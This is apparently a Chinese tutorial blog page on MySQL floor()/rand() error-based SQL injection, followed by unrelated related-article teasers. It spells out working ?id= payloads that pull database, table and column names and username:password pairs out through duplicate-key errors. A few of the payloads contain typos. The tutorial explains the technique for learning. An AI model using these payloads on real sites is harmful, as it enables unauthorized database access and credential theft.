sql知识总结三

3.floor报错注入

(1)涉及到的函数
as 别名,group by 分组

>select concat_ws('-',(select database()),floor(rand()*2)) as a from users group by a;

count()函数  汇总统计数量

>select count(*),concat_ws('-',(select database(0),floor(rand()*2) as a from users group by a;

偶尔出现报错#1062 - Duplicate entry'security-0' for key '<group-key>'

偶尔报错的原因

报错原理

报错语句和报错位置

>select floor(rand()*2) from users;  

#根据表users的行数随机显示0或者1

>select floor(rand(0)*2) from users;

#计算不再随机,而是按一定顺序排列

>select floor(rand(1)*2)from uses;

>select count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from users group by a;

固定报错

>select count(*),concat_ws('-',(select database()),floor(rand(1)*2)) as a from users group by a;

固定不报错     

floor(rand(0)*2)   [0 1 1 0 1]

floor(rand(1)*2)   [0 1 0 0 0]

from users 的作用是让rand()产生足够多次数的计算,一般使用行数比较多的默认数据表information_schema.tables

(2)floor注入

?id=1' --+union 1,count(*),concat_ws('-',(select vision()),floor(rand(0)*2)) as x  from infomati0n_schema.tables group by x  --+

?id=0' union select 1,count(*),concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+

?id=0' union select 1,count(*),concat_ws('-',(select group_concat(column_name) from information_schema.column where table_schema=database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+

?id=0' union select 1,count(*),concat_ws('-',(select group_concat(username,':',password) from users),floor(rand(0)*2)) as a from information_schema.tables group by a --+

使用group_concat无法显示,可以尝试concat

?id=0' union select 1,count(*),concat_ws('-',(select concat('~',id,username,':',password) from users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+

limit 0,1 从0开始显示第一行

1 Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

 

1 count():count()函数返回匹配指定条件的行数。count(*)函数返回表中的记录数
 

2 floor():floor:函数是用来向下取整呢个的,相当于去掉小数部分
 

3 rand():rand()是随机取(0,1)中的一个数,但是给它一个参数后0,即rand(0),并且传如floor()后,即:floor(rand(0)*2)它就不再是随机了,序列0110110
 

4 concat():用于连接两个字符串
 

5 group by x:x就是相当于 as x,设一个别名
 

6 0x26:16进制数值,ASCII为“&”,在回显中起到分隔作用
 












本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/2008.shtml


如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!











相关文章










Attention和Transformer灵魂七问








Attention和Transformer灵魂七问




1. 引言 
最近&#xff0c;ChatGPT和其他聊天机器人将大语言模型LLMs推到了风口浪尖。这就导致了很多不是学ML和NLP领域的人关注并学习attention和Transformer模型。在本文中&#xff0c;我们将针对Transformer模型结构提出几个问题&#xff0c;并深入探讨其背后的技术理论。这…




阅读更多...

















YoloV9改进策略:下采样改进|自研下采样模块(独家改进)|疯狂涨点|附结构图








YoloV9改进策略:下采样改进|自研下采样模块(独家改进)|疯狂涨点|附结构图




文章目录 摘要自研下采样模块及其变种第一种改进方法 YoloV9官方测试结果改进方法测试结果总结 摘要 
本文介绍我自研的下采样模块。本次改进的下采样模块是一种通用的改进方法&#xff0c;你可以用分类任务的主干网络中&#xff0c;也可以用在分割和超分的任务中。已经有粉丝用…




阅读更多...

















【电控笔记5.4】pwm延迟








【电控笔记5.4】pwm延迟




PWM延迟 1标准采样法 
Td=MCU计算延迟+输出延迟 Tcon=电流控制周期 Ts=PWM载波周期 Td=1.5Ts(6.3节 )   
电流环跟PWM采样周期同步  
2修改采样法




阅读更多...

















AR HUD_VSLAM+显示技术








AR HUD_VSLAM+显示技术




智能座舱的一个重要技术方向是表达与展示。HUD可以将驾驶相关的信息&#xff0c;如车速、导航等投射到驾驶员的视线上方&#xff0c;避免驾驶员的目光离开前方道路。这种显示方式可以提供关键信息的实时展示&#xff0c;减少驾驶员的分心。 HUD的技术原理就是通过光学系统将信息…




阅读更多...

















【PCL】教程global_hypothesis_verification  通过验证模型假设来实现 3D 对象识别与位姿估计...








【PCL】教程global_hypothesis_verification  通过验证模型假设来实现 3D 对象识别与位姿估计...




测试程序1 milk.pcd milk_cartoon_all_small_clorox.pcd 终端输出1&#xff1a; Model total points: 12575; Selected Keypoints: 193
Scene total points: 307200; Selected Keypoints: 7739
[pcl::SHOTEstimation::computeFeature] The local reference frame is not valid!…




阅读更多...

















初入单元测试








初入单元测试




单元测试&#xff1a;针对最小的功能单元(方法)&#xff0c;编写测试代码对其进行正确性测试 Junit可以用来对方法进行测试&#xff0c;虽然是有第三方公司开发&#xff0c;但是很多开发工具已经集成了&#xff0c;如IDEA。 
Junit 
优点&#xff1a;可以灵活的编写测试代码&am…




阅读更多...

















【C++】类和对象初探:类的实例化与对象生命周期管理,解析this指针的奥秘








【C++】类和对象初探:类的实例化与对象生命周期管理,解析this指针的奥秘




欢迎来到CILMY23的博客 
本篇主题为&#xff1a; 类和对象初探&#xff1a;类的实例化与对象生命周期管理&#xff0c;解析this指针的奥秘 
个人主页&#xff1a;CILMY23-CSDN博客 
系列专栏&#xff1a;Python | C | C语言 | 数据结构与算法 
感谢观看&#xff0c;支持的可以给…




阅读更多...

















医学影像图像去噪:滤波器方法、频域方法、小波变换、非局部均值去噪、深度学习与稀疏表示和字典学习








医学影像图像去噪:滤波器方法、频域方法、小波变换、非局部均值去噪、深度学习与稀疏表示和字典学习




医学影像图像去噪是指使用各种算法从医学成像数据中去除噪声,以提高图像质量和对疾病的诊断准确性。MRI(磁共振成像)和CT(计算机断层扫描)是两种常见的医学成像技术,它们都会受到不同类型噪声的影响。 在医学影像中,噪声可能来源于多个方面,包括成像设备的电子系统、患…




阅读更多...

















[RTOS 学习记录] 工程管理工具make及makefile








[RTOS 学习记录] 工程管理工具make及makefile




[RTOS 学习记录] 工程管理工具make及makefile 这篇文章是我阅读《嵌入式实时操作系统μCOS-II原理及应用》后的读书笔记&#xff0c;记录目的是为了个人后续回顾复习使用。 前置内容&#xff1a; 
开发工具 Borland C/C 3.1 精简版 文章目录 1 make 工具2 makefile 的内容结构3…




阅读更多...

















MLLM | InternLM-XComposer2-4KHD: 支持336 像素到 4K 高清的分辨率的大视觉语言模型








MLLM | InternLM-XComposer2-4KHD: 支持336 像素到 4K 高清的分辨率的大视觉语言模型




上海AI Lab&#xff0c;香港中文大学等 
论文标题:InternLM-XComposer2-4KHD: A Pioneering Large Vision-Language Model Handling Resolutions from 336 Pixels to 4K HD 
论文地址:https://arxiv.org/abs/2404.06512 
Code and models are publicly available at https://gi…




阅读更多...

















使用 ollama 部署最新的Llama 3 70B本地模型








使用 ollama 部署最新的Llama 3 70B本地模型




一、ollama是什么? 在本地启动并运行大型语言模型。运行Llama 3&#xff0c;Mistral, Gemma, Code Llama和其他模型。自定义并创建您自己的。 综合优点&#xff1a; 快速下载容器自动运行大模型&#xff0c;现在下载&#xff0c;马上上手。本地利用 cpu 运行大模型&#xff0c…




阅读更多...

















【Hadoop】-Apache Hive概述  Hive架构[11]








【Hadoop】-Apache Hive概述  Hive架构[11]




目录 
Apache Hive概述 
一、分布式SQL计算-Hive 
二、为什么使用Hive 
Hive架构 
一、Hive组件 Apache Hive概述 
Apache Hive是一个在Hadoop上构建的数据仓库基础设施&#xff0c;它提供了一个SQL-Like查询语言来分析和查询大规模的数据集。Hive将结构化查询语言&#xff08;…




阅读更多...

















视频教程下载:ChatGPT驱动的SEO、网络营销、生产力提升








视频教程下载:ChatGPT驱动的SEO、网络营销、生产力提升




用户遇到的一个常见问题是在ChatGPT对话过程中难以保持清晰的目的和专注。这可能导致互动无效和浪费时间。这门课程将教给各种创意人士——艺术家、制造者、博主、讲师和内容创作者——如何制定理想的提示配方&#xff0c;从而产生更有成效的对话和更高的回报。 
这是一门关于如…




阅读更多...

















【入门篇】本章包括创建云项目、数据库的使用、云存储管理、云函数的基本使用、实战举例(小程序之云函数开发入门到使用发布上线实操)








【入门篇】本章包括创建云项目、数据库的使用、云存储管理、云函数的基本使用、实战举例(小程序之云函数开发入门到使用发布上线实操)




云函数 云函数相当于服务器接口的概念,它并属于小程序端代码。它是以函数的形式运行后端代码来响应事件以及调用其他服务。运行环境是Node.js。 一、基创建云函数项目 打开微信开发者工具: 打开微信开发者工具,并登录你的微信开发者账号。 创建项目: 如果还没有创建项目,你…




阅读更多...

















7. Django 模型与数据库








7. Django 模型与数据库




第7章 模型与数据库 
Django对各种数据库提供了很好的支持, 包括PostgreSQL, MySQL, SQLite和Oracle, 
而且为这些数据库提供了统一的API方法, 这些API统称为ORM框架.
通过使用Django内置的ORM框架可以实现数据库连接和读写操作.
本章以SQLite数据库为例, 分别讲述Django的模型…




阅读更多...

















Ai-WB2 系列模组SDK接入亚马逊云








Ai-WB2 系列模组SDK接入亚马逊云




文章目录 前言一、准备二、亚马逊云物模型建立1. 注册亚马逊账号&#xff0c;登录AWS IoT控制台&#xff0c;[注册地址](https://aws.amazon.com/cn/)2. 创建好之后点击登录3. 创建物品以及下载证书 三、连接亚马逊云demo获取以及配置1. 下载源码2. 按照顺序执行下面指令3. 修改…




阅读更多...

















用友U8-Cloud api/hr接口存在SQL注入漏洞








用友U8-Cloud api/hr接口存在SQL注入漏洞




声明&#xff1a; 
本文仅用于技术交流&#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失&#xff0c;均由使用者本人负责&#xff0c;文章作者不为此承担任何责任。 
简介 
U8 Cloud是由用友推出的新一代云ERP系统&#xff0…




阅读更多...

















20240331-1-基于深度学习的模型








20240331-1-基于深度学习的模型




基于深度学习的模型 
知识体系 
主要包括深度学习相关的特征抽取模型&#xff0c;包括卷积网络、循环网络、注意力机制、预训练模型等。 
CNN 
TextCNN 是 CNN 的 NLP 版本&#xff0c;来自 Kim 的 [1408.5882] Convolutional Neural Networks for Sentence Classification 
结…




阅读更多...

















hadoop安装记录








hadoop安装记录




零、版本说明 
centos 
[rootnode1 ~]# cat /etc/redhat-release 
CentOS Linux release 7.9.2009 (Core)jdk 
[rootnode1 ~]# java -version
java version "1.8.0_311"
Java(TM) SE Runtime Environment (build 1.8.0_311-b11)
Java HotSpot(TM) 64-Bit Server VM (…




阅读更多...

















编写一款2D CAD/CAM软件(十六)交互绘制图形








编写一款2D CAD/CAM软件(十六)交互绘制图形




绘制步骤 
以交互绘制圆形为例&#xff1a; 
点击鼠标左键&#xff0c;确定圆心位置&#xff1b;抬起鼠标&#xff0c;移动鼠标&#xff0c;半径随鼠标位置变化&#xff1b;点击左键确定半径&#xff0c;完成圆的绘制。 
绘制结果 Code 
/// j-operator-create-circle.h#pragma…




阅读更多...


















推荐文章












最新文章


















Copyright @ 2022~2023